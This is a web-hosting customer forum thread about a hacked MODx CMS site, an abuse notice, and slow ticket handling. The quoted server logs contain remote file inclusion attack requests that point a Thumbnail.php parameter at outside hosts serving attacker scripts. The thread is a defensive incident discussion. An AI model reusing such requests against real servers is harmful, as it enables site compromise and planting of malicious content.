Abuse of website?

[nzkiwi]

Background:

I have a client running MODx CMS which was hacked on Nov-3. After the attack I deleted the entire contents of the site and on 7-Nov installed version 0.9.2.2 of MODx. I also have also set register_globals off by adding "php_flag register_globals off" to .htaccess.

Either setting register_globals to off or installing version 0.9.2.2 of MODx is supposed to fix the security flaw. So imagine my surprise when when yesterday I received this from the Abuse Dept:

Dear Customer,

Your script hosted at [domain.name.hidden] are highly vulnerable and allowed hackers to upload their malicious content and execute it.
Kindly correct/update your scripts as soon as possible. The webserver logs are attached herewith.
The script responsible for the issue(Thumbnail.php) has been disabled for now. Please dont enable it again unless you are sure the issue has been corrected.

The attached log included entries like:

82.75.139.224 - - [10/Nov/2006:11:30:07 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.dkarns.com/tCustom/install? HTTP/1.1" 200 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
201.27.109.141 - - [10/Nov/2006:12:14:45 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.psychicchronicles.co.uk/forum/chat//inc/cmses/sh.txt? HTTP/1.1" 200 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.96.134.106 - - [10/Nov/2006:14:40:27 -0500] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://free-ftp.org/suceveanul/sep3.txt? HTTP/1.1" 200 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
83.137.17.37 - - [10/Nov/2006:16:19:26 -0500] "GET //manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.cyclechem.com/list.txt?? HTTP/1.1" 200 978 "-" "libwww-perl/5.79"
83.137.17.37 - - [10/Nov/2006:16:19:30 -0500] "GET /2004_shows.htm/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.cyclechem.com/list.txt?? HTTP/1.1" 200 11736 "-" "libwww-perl/5.79"

My question is: How can i verify whether the information shown in the log represents successful abuse, or whether the entries show both unsuccessful and successful attempts, and how can we identify which is which?

I opened a ticket seeking the above info over 12 hours ago, but as seems to be my fate, I have heard back absolutely nothing

ID: EUY-16410-798
Status: new
Priority: unassigned
Opened: Sat Nov 18 2006 09:54AM
Last Msg: Sat Nov 18 2006 09:46AM
Due: Sat Nov 18 2006 10:54AM

 

[Stephen]

nz, actually this type would require the sender to reply to you or Tanmaya/Deepak to look at logs and tell you, so it may take a bit longer.

 

[nzkiwi]

nz, actually this type would require the sender to reply to you or Tanmaya/Deepak to look at logs and tell you, so it may take a bit longer.

As usual, if I post to the forums, a response to a ticket occurs within a very short time!

I don't mind if it takes 24 or 48 hours to get an answer to my question. However, not receiving a response for such a long time is what irritates me. The ticket now has a response:

Hello,

We are looking into it and update you soon.


Thanks and Regards
Akshay

That's all I wanted. If that had been added to the ticket hours ago I would not be posting here. Please Jodohost, keep your customers informed.

 

[nzkiwi]

Well, it appears to me that all the hack attempts since 7-Nov have been unsuccessful and I have provided Jodo with the evidence to support the claim. Just waiting for Support or Abuse to re-enable the script )

 

[tanmaya]

For clarification to this post, their was a hacked file left in a hidden location inside client's folders causing more uploads of malacious content.

 

[nzkiwi]

Yes, we managed to "restore" a hacked script! X(

Thanks to Tanmaya and his team, it has all been sorted out )
(however Thumbnail.php was not the culprit)

Now if JH could improve on the ticket system so it didn't show "unassigned" when someone was actually working on it, I would be ecstatic

 

[tanmaya]

Now if JH could improve on the ticket system so it didn't show "unassigned" when someone was actually working on it, I would be ecstatic

Give us some time on this. A lot has been going recently. As soon as we get to Cerberus 3.2, we will certainely consider it.
At present if it is assigned to someone, others cant see it at all.